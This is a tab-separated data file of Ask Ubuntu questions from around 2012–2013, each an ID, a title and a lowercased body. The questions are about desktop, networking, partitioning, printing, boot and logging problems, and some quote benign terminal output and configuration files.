237750	how do i change the unity launcher icon back to the default ?	i recently installed the edubuntu-artworkpack along with theedubuntu-wallpaperspackage . the unity launcher icon immediately switched to the edubuntu logo . my question is , how do i switch this back to the original ubuntu logo ? also , the login screen shows the edubuntu banner on it as well .
237755	automatic logout when typing password	i think it may be due the graphic card driver i installed . is there anyway i can get in through a back door to the admin so i can uninstall the driver ?
237756	ubuntu for phones - is there a terminal similar to the one known from pc 's ?	i am thinking about install ubuntu on a phone . i spend a lot of time in terminal while working on my pc . there are much things i do using bash scripts , for example . then , is there a terminal on ubuntu for phones ? does it work with bash ? are commands similar to standard unix commands ( like ls , touch , echo , mkdir , ... ) ? is the filesystem similar to ext3 or other linux-like ? does it depend on phone model ? finishing , i mean i want not to get used to new things , such as new file systems , new terminals , new commands , etc ... just want to have old good ubuntu on my phone . thanks for answer !
237757	( initramfs ) unable to find a medium containing a live file system	i am trying to install ubuntu 12.10 . however , i get the following error : ( initramfs ) unable w to find a medium containing a live file system i get this every time i try to install it on an old dual core pc . i 'm booting from a usb but do n't have any other usb ports in use . is there something in particular that i 'm doing wrong or should i try installing using a cd ?
237758	scrollbars when root user	when i open an application as root i get gnome2-like scrollbars which is fine . but : the small arrows at top and bottom of the scrollbars are missing . the function of clicking between arrow and slider of the scrollbar to `` scroll '' down one page is also missing , it just jumps to the position of the cursor ( making it really hard to scroll through huge list like in synaptic ) . is there any way to resolve these issues ? ca n't they look like in firefox for example ?
237759	error when using xrandr to add new resolution	i 've been having some difficulty adding a new resolution using xrandr and outputting it to my second monitor , which is a panasonic viera tx-p42g10e . this is what i run on my ubuntu 12.04 lts : kapacs @ linux : ~ $ cvt 1920 1200 60 # 1920x1200 59.88 hz ( cvt 2.30ma ) hsync : 74.56 khz ; pclk : 193.25 mhz modeline `` 1920x1200_60.00 '' 193.25 1920 2056 2256 2592 1200 1203 1209 1245 -hsync +vsync i add it using -- newmode and it successfully appears : kapacs @ linux : ~ $ xrandr screen 0 : minimum 8 x 8 , current 1024 x 768 , maximum 8192 x 8192 vga-0 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0*+ 1360x768 60.0 59.8 1152x864 60.0 800x600 72.2 60.3 56.2 680x384 119.9 119.6 640x480 59.9 512x384 120.0 400x300 144.4 320x240 120.1 lvds-0 connected ( normal left inverted right x axis y axis ) 1920x1200 60.0 + dvi-d-0 disconnected ( normal left inverted right x axis y axis ) 1920x1200_60.00 ( 0x2b5 ) 193.2mhz h : width 1920 start 2048 end 2256 total 2592 skew 0 clock 74.5khz v : height 1200 start 1201 end 1204 total 1242 clock 60.0hz then , when i try to assign it to the vga-0 output terminal , it hits me with this . kapacs @ linux : ~ $ xrandr -- addmode vga-0 1920x1200_60.00 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 153 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 27 current serial number in output stream : 28 any advice is greatly welcome , i 've tried the xorg.conf version as well and it did not work . tutorial i tried . thank you !
237761	ubuntu as router , 2 nics , 2 lans , outside lan can not connect to inside lan	how can i make lan on 192.168.1.xxx ( eth2 ) forward packets to other lan ( eth0 ) 10.42.0.19 ( win7 pc ) ? both the lans are connected to ubuntu pc . i can ping from pc connected to eth0 to pc connected to eth2 . however , i can not ping from pc connected to eth2 to pc connected to eth0 . you can see tracert can complete on way but not other way . how to make that work ? this way from second win7 works to first win7 : c : \users\scott > tracert 192.168.200.36 tracing route to win7 [ 192.168.200.36 ] over a maximum of 30 hops : 1 < 1 ms < 1 ms < 1 ms scott-p5qc [ 10.42.0.1 ] 2 < 1 ms < 1 ms < 1 ms wr850g.hr.cox.net [ 192.168.1.1 ] 3 25 ms 24 ms 31 ms win7 [ 192.168.1.100 ] 4 18 ms 17 ms 40 ms win7 [ 192.168.200.36 ] trace complete . this way from first win7 to second win7 is broken : c : \users\scott > tracert 10.42.0.19 tracing route to 10.42.0.19 over a maximum of 30 hops 1 52 ms 1 ms 1 ms hubrouter.westell.com [ 192.168.200.1 ] 2 43 ms 98 ms 45 ms 192.168.1.1 3 45 ms 105 ms 24 ms scott-pc [ 192.168.1.102 ] 4 scott-pc [ 192.168.1.102 ] reports : destination protocol unreachable . trace complete . from first win7 to ubuntu router works : c : \users\scott > tracert 10.42.0.1 tracing route to scott-p5qc [ 10.42.0.1 ] over a maximum of 30 hops : 1 105 ms < 1 ms 4 ms hubrouter.westell.com [ 192.168.200.1 ] 2 19 ms 17 ms 33 ms 192.168.1.1 3 35 ms 34 ms 5 ms scott-p5qc [ 10.42.0.1 ] trace complete . netstat routes in ubuntu router : scott @ scott-p5qc : ~ $ netstat -r kernel ip routing table destination gateway genmask flags mss window irtt iface default wr850g.hr.cox.n 0.0.0.0 ug 0 0 0 eth2 10.42.0.0 * 255.255.255.0 u 0 0 0 eth0 link-local * 255.255.0.0 u 0 0 0 eth0 192.168.1.0 * 255.255.255.0 u 0 0 0 eth2 hand copy of lan layout : i have also posted this question at ubuntu forums
237767	hard-drive partitioning after ubuntu 12.04.1 lts installation	how can i partition my hard drive ( so as to share files between windows 7 and ubuntu 12.04.1 lts ) after i 've already installed the ubuntu os on the initial ntfs hard drive ( which has allowed for dual boot capabilities ) ? @ vasa1 johnmellin @ ubuntu : ~ $ sudo fdisk -l [ sudo ] password for johnmellin : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8d769ec6 device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs/exfat /dev/sda2 409600 598849535 299219968 7 hpfs/ntfs/exfat /dev/sda3 598849536 625139711 13145088 7 hpfs/ntfs/exfat johnmellin @ ubuntu : ~ $ sudo parted -l model : ata hitachi hts72323 ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 210mb 209mb primary ntfs boot 2 210mb 307gb 306gb primary ntfs 3 307gb 320gb 13.5gb primary ntfs
237768	unsuccessful upgrade from 11.10 to 12.4 lts leads to black screen with cursor blinking	during the upgrade from 11.10 to 12.4 , i got stuck on a screen with background image , and nothing else . i restarted the computer , and after grub menu , screen gets black with cursor blinking . i 've tried getting into text mode , by removing quiet splash , and by adding text , but it leads to the same black screen . so , i cant get to both text or graphical mode . i 'm stuck on grub menu . what can i do to get it working again ? thanks !
237772	can i write keyboard shortcut in bash script ?	can i write keyboard shortcut in bash script like : # ! bin/bash echo hello ^z # this is kbd shortcut this did n't work . is there any other way ?
237773	how to install usb modem for wireless internet on ubuntu 12.04	i need to install the mf195e usb modem supplied by the european isp `` orange '' on a ubuntu 12.04 machine . currently the system does not seem to respond at all when inserting the usb modem . any help would be greatly appreciated .
237774	how to install pyqt4 for python2.6 ?	i am currently stuck using both python2.6 and python2.7 on lubuntu 12.10 . 2.6 is required for a piece of software . in attempting to write a plug-in for this software ( opticks ) , i need to be able to access pyqt4 . using apt-get install python-qt4 i get a perfectly working installation for 2.7 ... i have tried altering the default python version and changing the soft link in /usr/bin to 2.6 . no joy . pip-2.6 and easy_install-2.6 are also unable to install pyqt4 due to the lack of a setup.py file . i was able to get this functioning using the suggestion from @ dobey and a link on compiling pyqt for python2.7 . in the link , simply change ally python2.7 calls to python2.6 .
237776	700 instead of 755 permissions on auto-mounted usb hdd ?	i 'm running ubuntu 12.10 ( kernel 3.5.0-21-generic ) on a laptop , and seem to have run into a strange problem with an auto-mounted external fat32 usb hdd : the permissions of the drive 's mount-directory , and everything in it , is mapped to `` drwx -- -- -- '' ( 700 ) after the auto-mount . the usb-mounted hdd is a western digital wdc wd5000bpvt-22hxzt3 ( sata-2 ) ; i have another one of these built into the laptop , and that one runs like a charm . from my understanding the permissions should be 755 instead , and the 700 setting causes serious problems with my backup program ( lucky backup ) ; the software simply can not backup anything anymore because it can not access the directories on the usb drive . however , manually copying the data to the usb hdd ( using nautilus or the terminal ) does n't cause access problems . this might be connected , as these programs access the files directly , not indirectly using a cron-job like the backup tool . i did a lot of googling today to try and find similar cases with sollutions , but none worked so far ; the best hint i found was that the permissions may get reset to 700 whenever the mouning procedure finds a problem with the usb hdd , for whatever reason . if checked the logs , and found that the device was indeed causing `` hdio_get_identity failed for '/dev/sdc ' : invalid argument '' warnings because of hdparm , so i set the `` nohdparm '' option in the grub_cmdline_linux_default setting in /etc/default/grub . checking the logs indicates this took care of the warnings , but sadly did n't change the usb hdd permissions back to normal . then i tried another idea that suggested defining a usb mount policy , but no luck there either , it did n't change anything . therefore my questions remain : what are the reasons for fat32 usb hdds being auto-mounted with permission 700 ? and if this is intended , are the powers that be aware how much software is not using the current user to access files ? is this in any way connected with this 3-year-old bug ? https : //bugs.launchpad.net/ubuntu/+source/nautilus/+bug/390040/ is there a workaround that does n't involve avoiding fat32 on the usb hdds ? after all i like being able to directly access data backups from multiple os 's ... thanks in advance ...
237777	is there a tool like wifi analyzer for ubuntu ?	wifi analyzer is a thorough application on android for managing wap , wifi strength signal etc . i was wondering if there was a similar tool for ubuntu
237781	can only connect to google sites via mobile broadband	i 'm on ubuntu 12.10 ( using xubuntu ) and i 'm trying to surf the web using my mobile phone ( plugged to my laptop using a usb cable ) . for some reason i can only connect to google.com and other google sites ( gmail , youtube , etc . ) , but i get a timeout when i try to connect to any other site . i can ping any website just fine , i get the ip address and no package loss , etc . just in case , i changed the dns to google 's dns , but that did n't change anything . i 'm going online with an old htc diamond ( windows mobile 6.3 ) and a prepaid plan ( simyo ) , if that 's relevant . the connection works on windows xp just fine . i found this thread , which led me to this thread with a very similar problem , but the solution did nothing for me . changed the mtu both on the phone and on the laptop to 1492 , nothing . i also made sure that there 's no ipv6 problem . `` dig aaaa heise.de '' gives me back an ipv6 address just fine . probably of interest is that using traceroute both on sites that do work ( google.com ) and do not work ( most anything else ) gives the same result . conti @ kleinerfuchs : ~ $ traceroute google.com traceroute to google.com ( 173.194.65.100 ) , 30 hops max , 60 byte packets 1 * * * 2 10.32.144.85 ( 10.32.144.85 ) 750.096 ms 750.048 ms 750.020 ms 3 * * * 4 * * * 5 * * * 6 * * * 7 * * * 8 * * * 9 * * * 10 * * * 11 * * * 12 * * * 13 * * * 14 * * * 15 * * * 16 * * * 17 * * * 18 * * * 19 * * * 20 * * * 21 * * * 22 * * * 23 * * * 24 * * * 25 * * * 26 * * * 27 * * * 28 * * * 29 * * * 30 * * * conti @ kleinerfuchs : ~ $ traceroute heise.de traceroute to heise.de ( 193.99.144.80 ) , 30 hops max , 60 byte packets 1 * * * 2 10.32.144.85 ( 10.32.144.85 ) 689.215 ms 689.186 ms 689.139 ms 3 * * * 4 * * * 5 * * * 6 * * * 7 * * * 8 * * * 9 * * * 10 * * * 11 * * * 12 * * * 13 * * * 14 * * * 15 * * * 16 * * * 17 * * * 18 * * * 19 * * * 20 * * * 21 * * * 22 * * * 23 * * * 24 * * * 25 * * * 26 * * * 27 * * * 28 * * * 29 * * * 30 * * * conti @ kleinerfuchs : ~ $ i have no idea what could be the issue here , and what else i could do , so here i am . help !
237783	why do i have two instances of the same partition in nautilus ?	do n't quite recall when this started behaving like this but gnome 's nautilus has been reporting a sort of 'ghost ' partition that 's labeled the same as the regular one : the partition resides on a raid1 . clicking on the 'ghost ' partition provides : mount : /dev/md127p1 already mounted or /media/music_library busy mount : according to mtab , /dev/md127p1 is already mounted on /media/music_library my fstab : # / was on /dev/sdh2 during installation uuid=15bb606e-54af-4fa3-8341-12824a404dae / ext4 errors=remount-ro 0 1 # /home was on /dev/sdh3 during installation uuid=9eed87ee-f9d5-47c7-91e5-b82696142f7e /home ext4 defaults 0 2 # swap was on /dev/sdh4 during installation uuid=27f06259-705d-48ba-83d6-3e1837a87198 none swap sw 0 0 # music raid uuid=d10e627b-6068-4734-9111-5e2f71dbbe4f /media/music_library ext4 auto , user 0 1 i 'm running 12.04 .
237787	where can i apply for jobs at canonical ?	i 'm web-developer , and now i want to learn a new technology stack . i 'm interested in working canonical on ubuntu-desktop or possibly the ubuntu-phone project . i want to apply for a job at canonical in future and i want to know what general skills they are looking for .
237791	printing does not work on a sharp mx 2310u	help please with a little printer probem . i am using a sharp-mx-2310u printer on the network with ubuntu 12.10 . followed all the normal setup and looking at cups localhost:631/printers/ i see the printer but no print jobs are printed and /var/spool/cups just keeps on filling with unfinished jobs . the printer properties display the ink status etc so i do have connection to the printer but localhost:631/printers/ shows : sharp-mx-2310u sharp mx-2310u office sharp mx-2300n foomatic/pxlcolor ( recommended ) idle - `` waiting for printer to finish . '' looking in localhost:631/admin/log/error_log i get a number of errors but nothing that is obvious . e [ 08/jan/2013:10:31:26 +0000 ] unknown directive systemgroup on line 16 of /etc/cups/cupsd.conf . e [ 08/jan/2013:10:31:26 +0000 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! e [ 08/jan/2013:11:22:41 +0000 ] unknown directive systemgroup on line 16 of /etc/cups/cupsd.conf . e [ 08/jan/2013:15:51:29 +0000 ] unknown directive systemgroup on line 16 of /etc/cups/cupsd.conf . e [ 08/jan/2013:15:52:43 +0000 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! w [ 08/jan/2013:15:53:22 +0000 ] addprofile failed : org.freedesktop.dbus.error.unknownmethod : no such interface `org.freedesktop.colormanager ' on object at path /org/freedesktop/colormanager/devices/cups_sharp_mx_2310u w [ 08/jan/2013:15:53:22 +0000 ] addprofile failed : org.freedesktop.dbus.error.unknownmethod : no such interface `org.freedesktop.colormanager ' on object at path /org/freedesktop/colormanager/devices/cups_sharp_mx_2310u w [ 08/jan/2013:15:54:04 +0000 ] [ job 1 ] the printer is unreachable at this time . w [ 08/jan/2013:15:54:27 +0000 ] [ job 1 ] the printer is unreachable at this time . w [ 08/jan/2013:15:54:40 +0000 ] [ job 1 ] the printer is unreachable at this time . e [ 08/jan/2013:15:54:55 +0000 ] [ job 1 ] the printer is not responding . e [ 08/jan/2013:16:08:22 +0000 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! e [ 08/jan/2013:16:09:40 +0000 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! e [ 08/jan/2013:16:11:33 +0000 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! e [ 08/jan/2013:16:13:38 +0000 ] unknown directive systemgroup on line 16 of /etc/cups/cupsd.conf . e [ 08/jan/2013:16:14:21 +0000 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! w [ 08/jan/2013:16:14:45 +0000 ] addprofile failed : org.freedesktop.dbus.error.unknownmethod : no such interface `org.freedesktop.colormanager ' on object at path /org/freedesktop/colormanager/devices/cups_sharp_mx_2310u w [ 08/jan/2013:16:14:45 +0000 ] addprofile failed : org.freedesktop.dbus.error.unknownmethod : no such interface `org.freedesktop.colormanager ' on object at path /org/freedesktop/colormanager/devices/cups_sharp_mx_2310u e [ 08/jan/2013:16:28:03 +0000 ] unknown directive systemgroup on line 16 of /etc/cups/cupsd.conf . w [ 08/jan/2013:16:28:04 +0000 ] addprofile failed : org.freedesktop.dbus.error.unknownmethod : no such interface `org.freedesktop.colormanager ' on object at path /org/freedesktop/colormanager/devices/cups_sharp_mx_2310u w [ 08/jan/2013:16:28:04 +0000 ] addprofile failed : org.freedesktop.dbus.error.unknownmethod : no such interface `org.freedesktop.colormanager ' on object at path /org/freedesktop/colormanager/devices/cups_sharp_mx_2310u
237793	guitarix amp simulator `` failed to allocate memory '' jackd	has anyone any experience with guitarix ? i have jack set up and working well with rakarrak but it wont work with guitarix it tells me `` could not allocate memory '' dont understand why . am i missing something ? please help ... ulimit -a core file size ( blocks , -c ) 0 data seg size ( kbytes , -d ) unlimited scheduling priority ( -e ) 0 file size ( blocks , -f ) unlimited pending signals ( -i ) 47217 max locked memory ( kbytes , -l ) unlimited max memory size ( kbytes , -m ) unlimited open files ( -n ) 1024 pipe size ( 512 bytes , -p ) 8 posix message queues ( bytes , -q ) 819200 real-time priority ( -r ) 95 stack size ( kbytes , -s ) 8192 cpu time ( seconds , -t ) unlimited max user processes ( -u ) 47217 virtual memory ( kbytes , -v ) unlimited file locks ( -x ) unlimited
237802	hp deskjet 1000-j110 prints then stops . never prints a full page . error 5012	let me preface with a thank you and that i am a beginner . ubuntu 12.04lts hp deskjet 1000-j110 was working great for months . then a few months back started giving me this problem . i have spent days trying to fix this , i have reinstalled all hplip , hpcups packages . i have tried a bunch of `` fixes '' to no avail . it will always print the first few lines of any thing ( pdfs , docs , printer test page ) then stops . sometimes after a few seconds it will print a little more . out of the last 40 times i have tried to print stuff it has printed a full page 2 times . mostly it just stops mid print and then the light on the printer starts blinking on and off . after a while the printer will spit out the half printed sheet and the light will keep blinking . hp toolbox says device communication error code 5012 do n't really know what to do . i am pretty beginner and have considered ( 1 ) not using ubuntu anymore and using my xp install which i dont want to do or ( 2 ) trying to reinstall ubuntu . super frustrated . please help .
237803	how can i change how much disk space ubuntu has to use ?	after many years of using windows vista on my old computer suddenly windows has died : ( and i ca n't fix it any more : ( . i only allocated i think my bad about 18 gb of storage space . and since i 'm certain that i am done with windows so how can i increase the space allocated for ubuntu ?
237811	per network settings for a laptop	i often roam in different networks . some of those need special settings for dns or block mails to external mailservers and only accept internal smarthosts . i 'm looking for some kind of program where i can make settings based on networks . say the wireless network with essid foo needs a nameserver on address 10.32.5.12 plus one on 8.8.8.8 , wired network with essid bar takes any nameserver which comes per dhcp and so on . what programs do you know and what are the benefits of those ?
237821	how do i know which ram i 'm using ?	i want to buy some extra ram but hardinfo wont tell me which brand , model , latency and speed i 'm currently using to buy the same kind . what else can i use ?
237825	would mdadm be faster than fake raid adapter ?	i just bought myself 2 x 3tb wd red drives and a startech 4 port raid card . unfortunately , i have a very , very strong suspicion that this is a 'fake-raid ' card as it is not from any of the main manufacturers like lsi or 3ware . transferring files from a wd black 2tb to the raid 1 array is going at an appallingly slow rate of around 60mb/s . would it not be faster to remove the card , and set up software raid with mdadm ? -- update i just unplugged/unset the hardware raid 1 array , and re-plugged in the drives directly to the motherboard . transfers direct from drive to drive appear to go at 120mb/s ( exactly double ) . i realise that raid1 has to duplicate the data , but surely it reads at 120mb/s from one drive and each raid drive should write at nearly 120mb/s on each of the reds ?
237829	will ubuntu phone os run ubuntu applications ?	now that the ubuntu phone os is coming soon , i 'm just wondering if it will be able to run ubuntu applications like libreoffice or something else that is not exactly made for the phone but is made for the ubuntu desktop
237830	sharing canon all in one over network	i have ubuntu 12.04 installed on an old computer i want to use as a file and printer server in a small office . i have samba sharing set up for file sharing and i 've been able to get all the computers to print via cups . i am now trying to get the scanner to work . on the ubuntu server i can scan an image using simple scan or xsane . i used this tutorial to set up saned and i can confirm that the saned process is running . i then downloaded and installed the twain sane interface for macos x binaries from http : //www.ellert.se/twain-sane/ i added the ip address of the ubuntu server to /usr/local/etc/sane.d/net.conf but when i open image capture on my mac i do n't see any devices . i run scanimage -l on the ubuntu machine and i get device `pixma:04a91737_32e09e ' is a canon canon pixma mx330 multi-function peripheral device `net:127.0.0.1 : pixma:04a91737 ' is a canon canon pixma mx330 multi-function peripheral device `net : localhost : pixma:04a91737 ' is a canon canon pixma mx330 multi-function peripheral when i use xsane the pixma:04a91737_32e09e device scans properly the other two give me the error failed to open device 'net:127.0.0.1 : pixma:04a91737 : access to resource has been denied . i think this has something to do with configuring the sane pixma backend but i 'm confused about the bjnp proticol . can anyone help me out with getting the scanner to work over the network ?
237832	ca n't see the floating menu of virtualbox virtual machine !	i 'm running ubuntu 12.04 32 bit as guest on windows 7 64 bit . everything is fine except one thing..when take my mouse pointer near the top edge ( i set it at top ) ca n't get the floating menu of virtual box in full screen mode ... so i 'm not able to minimize my ubuntu virtual machine . even worse the ctrl , alt+tab combination to switch out of windows is also not working . i 'm also running linux mint 13 mate as guset where everything is fine so i guess this an ubuntu problem may be related to compiz etc stuff . virtual box version : 4.2.6 edit : guest additions are installed . before installing additions ubuntu was running in 1024x768 and now in full wide screen . as far as i remember the floating menu was available when guest additions were not installed . thanks .
237835	script to switch between two sound devices	i use two sound devices , normal analogue output and sound over hdmi . when i 'm not using the tv i leave it turned off and switch to the speakers . as i do this regularly i would like a script to do it for me . i did have a script which switched between the two , but only for the current application producing sound . i have lost it and ca n't seem to find the internet source . can anyone help me recreate this script ?
237836	dual-boot android & ubuntu	is it possible to run a dual-boot of ubuntu and android on the same device or will it have to be one or the other ? im looking at possiby dual booting the n7 or htc one x
237844	still updater problem	hello i tried to fix sources.list and it fixed , but still problem i ca n't download from that website , here is my terminal log . w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/release.gpg unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/games/binary-i386/packages unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/apps/binary-i386/packages unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/apps/i18n/translation-en_us unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/apps/i18n/translation-en unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/games/i18n/translation-en_us unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/games/i18n/translation-en unable to connect to archive.getdeb.net : http : e : some index files failed to download . they have been ignored , or old ones used instead . please i can change sources.list with another website link . to update this system . i hate it that website that 's offline . or removed .
237845	how to increase size of primary partition ?	i have installed ubuntu from windows 8 using windows installer on a small allocated space same partition as windows . now i want to use ubuntu as my primary os so want to allocate it more space . can i do that without loosing windows or linux data ?
237848	count lines in files from set	i need to count the number of lines in files from a set . i tried to execute find -name pattern -exec vc -l ' { } ' \ ; but this command returns find : `vc ' : no such file or directory
237849	software center shows an error message upon software installation	i am a newbie to linux please bear that in mind when responding . i use ubuntu 10.10 and i get the following error message when i try to install new software from software center : failed to download repostory information using old ones instead . i could not post the actual error message because your page said i am restricted on the number of hyperlinks i can post and there were many hyperlinks in the error message .
237853	how do i get ubuntu to boot on an intel x79 ( sandy bridge-e ) system ?	has anyone successfully installed ubuntu ( or any other flavour of linux ) on an intel x79 ( sandy bridge-e ) based system ? my system build is : msi big bang xpower ii intel core i7 3930k processor 32gb corsair vengeance ram evga gtx 670 ftw graphics card 4x2tb hard drives in raid 10 samsung 830 series 2x64gb ssd in raid 0 samsung 830 series 128gb ssd i am trying to install ubuntu on the 128gb ssd and i seem unable to successfully boot ubuntu . here 's what i 've tried : booting from a usb flash drive as well as dvd media uefi turned on , uefi turned off appending nomodeset acpi=off to boot parameters turning off all intel stepping changing power control settings ubuntu 12.04 lts ubuntu 12.10 linux mint 13 disconnecting all hard drives except 128gb ssd nothing from the combinations of these seem to matter - i simply ca n't get it to boot . it gets stuck in the same place showing this screen during the boot cycle and the only way out of it seems to force it to shut down . i would appreciate any help on this .
237856	ubuntu 12.04 on lenovo thinkpad with uefi	i have installed ubuntu 12.04 desktop amd64 on my lenovo thinkpad e330 . there were no problem during installation . now i can boot to ubuntu and use it . but : now there is only one option in boot devices in my thinkpad 's bios : ubuntu i can boot thinkpad to ubuntu on hdd only - no other options . i switched bios to `` legacy devices only '' - this did not help : ( could you , please , help me and explain how to boot my thinkpad from usb drive ? how can i switch back to legacy devices and use mbr , not uefi ? thank you !
237861	grub keeps beeping ( because keyboard does not work ? )	i 'm trying to use an old laptop of which the keyboard does not work . i think a drink has been spilled over it a long time ago . this is not the problem , i 'm just using an external keyboard via usb . when i boot , the laptop goes into the grub menu , but it starts beeping quite loudly even after i selected ubuntu to boot . i found the following post how do i get gnu grub to stop beeping and allow me to select an option from the boot menu ? of which the first answer seems to agree with my problem . i think some key may have been short circuited . also when the screen after the boot menu shows , it seems that indeed a key is pressed continuously ( the screen writes 'aaaaaaaaaa.. ' ) . so probably the grub detects the notworking keyboard our ca n't handle the short circuited keys or something ? so my question is , how do i stop it from beeping ? i can use this laptop , once it has booted it works well with an external keyboard , but the beeping is really annoying . any suggestions ? btw , the ubuntu version is 10.4 . thanks !
237869	error : hd0 can not get c/h/s values . grub rescue >	the power supply went out on our machine . we replaced the power supply . now when we boot up , all we get is a blank screen with a blinking cursor . so we hold shift during boot up , and this error is displayed : error : hd0 can not get c/h/s values . grub rescue > i typed ls and i see ( hd0 ) and ( fd0 ) . is this installation screwed ? do we need to re-install ? if so , can we use an ubuntu live disc to retrieve some of our files from the hdd 's ? we are using : ubuntu 12.04 lts ( 32bit )
237872	ca n't resize extended partition	i 'm trying to use gparted from the ubuntu live cd and it wo n't allow me to resize the main extended partition . there is a `` key '' symbol next to it and the `` unmount '' option is grayed out .
237878	impossible to install ubuntu 12.10 both with wubi or regularly	i 've tried installing ubuntu 12.10 both with wubi and from live cd ( usb actually ) , neither of which was successful . with wubi , installing it inside windows , it gives a black screen after the first reboot . sometimes it writes : '' completing the ubuntu installation . for more installation boot options , press esc now ... 10 ... 9 ... 8 ... 0 '' and than it freezes again . i also tried pressing esc and , choosing any of the options , it still freezes . i 've searched on the internet and people say to use nomodeset after pressing f6 , but i never get to the screen where i can press f6 . so i added nomodeset by hand after quiet splash inside the file wubildr-disk.cfg ( i also tried to take away the quiet splash without any sucessful result ) . i also tried with the regular installation as a dual-boot . i can copy ubuntu live cd onto usb key with unetbootin and when i do the boot from the usb key , it freezes after unetbootin asks whether to install ubuntu/try ubuntu/check for errors on the cd/etc . here , i 've also tried out the nomodeset trick in the boot file but it failed . i think the problem is connected with the nvidia card but i do n't now how to solve it . i have an acer aspire 5750g , intel core i3 , nvidia gt520m , windows 7 ps : my first choice would be to install ubuntu inside windows ( i already had it this way but it blew up when i did the upgrade to 12.04 ) .
237879	post-installation script fails when installing slapd	i 'm trying to install slapd . i did dpkg-reconfigure and pressed ctrl+c in between , and after that this is what i get : apt-get install slapd ldap-utils reading package lists ... done building dependency tree reading state information ... done ldap-utils is already the newest version . slapd is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up slapd ( 2.4.31-1ubuntu2 ) ... omitting slapd configuration as requested . * starting openldap slapd [ fail ] invoke-rc.d : initscript slapd , action `` start '' failed . dpkg : error processing slapd ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : slapd e : sub-process /usr/bin/dpkg returned an error code ( 1 )
237880	is there a c/c++ compiler for ubuntu ?	is there a good c/c++ compiler out there for ubuntu ? i 'm going to be learning c soon and would like to know if i should just use windows for this or if i could use ubuntu just as well .
237881	chrome screen tearing while rendering pages	i know my question might be close to this question , but for me none of the solution fixed the issue completely , although one has improved the situation a bit . simply put , i have rendering problems on chrome on pages what seem to use latest fancy flash and other eye-candy ( youtube.com among them ) stuff . i am experiencing vertical tearing . some examples : what i have : os : ubuntu 12.04 video card : amd hd4870 ( still a beast of a card as it runs most new games on high end on high rezolution ) video driver : ati catalyst official 12.06 ( as my video card is considered legacy nowadays , that 's the driver to go . installing the latest 12.10 driver renders me an error of card not supported ) . output of sudo lshw -c video *-display description : vga compatible controller product : rv770 [ radeon hd 4870 ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:49 memory : d0000000-dfffffff memory : fe7e0000-fe7effff ioport : a000 ( size=256 ) memory : fe7c0000-fe7dffff i have this issues only since i installed the official amd drivers . until then i was using the default mesa drivers , and everything was working as a peach . but then steam came to linux , and i just had to jump on it . now my games run smoothly under ubuntu with steam , but i have this tearing issues in chrome . ahh , by the way , on firefox there are no issues . from the above mentioned post , i have enabled the `` tear free '' option , and that seemed to reduce the problem a bit , but still did n't eliminate it . any suggestions would be welcomed . edit : going to chrome : //plugins/ at the flash-player section i have to following :
237882	upgrade shows many errors ( mount command missing )	i have had a windows 7 pc that dual boots to ubuntu since a couple of years ago but have not used it lately . today i decided to upgrade to the latest version . it downloaded +1800 files and ubuntu started to upgrade itself , not without errors along the way . afterwards there was total chaos . i could not start ubuntu ( seemed to be a missing mount ) and i could no longer start windows . luckily i was able to recover windows 7 , but ubuntu is `` gone fishing '' . what do i do now ? should i delete ubuntu , and if yes , how is this done ? or is there a recovery option ?
237883	can source code ppa be safely deleted ?	so i was wondering.. whenever you add an ppa , you always get 2 entries . one `` normal '' ppa and a source code ppa ( the one that says ( source ) at the end of the line ) . since i am normally not interested in the source code , can the source code entries be safely deleted from the ppa list ? i like to keep things clean and might even improve the speed when updating.. : p
237884	syslog wo n't write to local file	on ubuntu 10.04 lts , i 'm using the stock rsyslog configuration and added a custom file in /etc/rsyslog.d with the following contents : # cat /etc/rsyslog.d/62-pc local3.debug /var/log/pc/debug.log local3 . * /var/log/pc/main.log the two referenced files exist and the files and containing directory are readable and writable by the syslog user . yet , the only place i find the messages is /var/log/syslog . /var/log/pc/main.log is empty . in addition , the messages in /var/log/syslog . i 've checked that the program from which the messages originate is not the cause of these troubles : the problem also occurs with the logger command . what can be wrong here ?
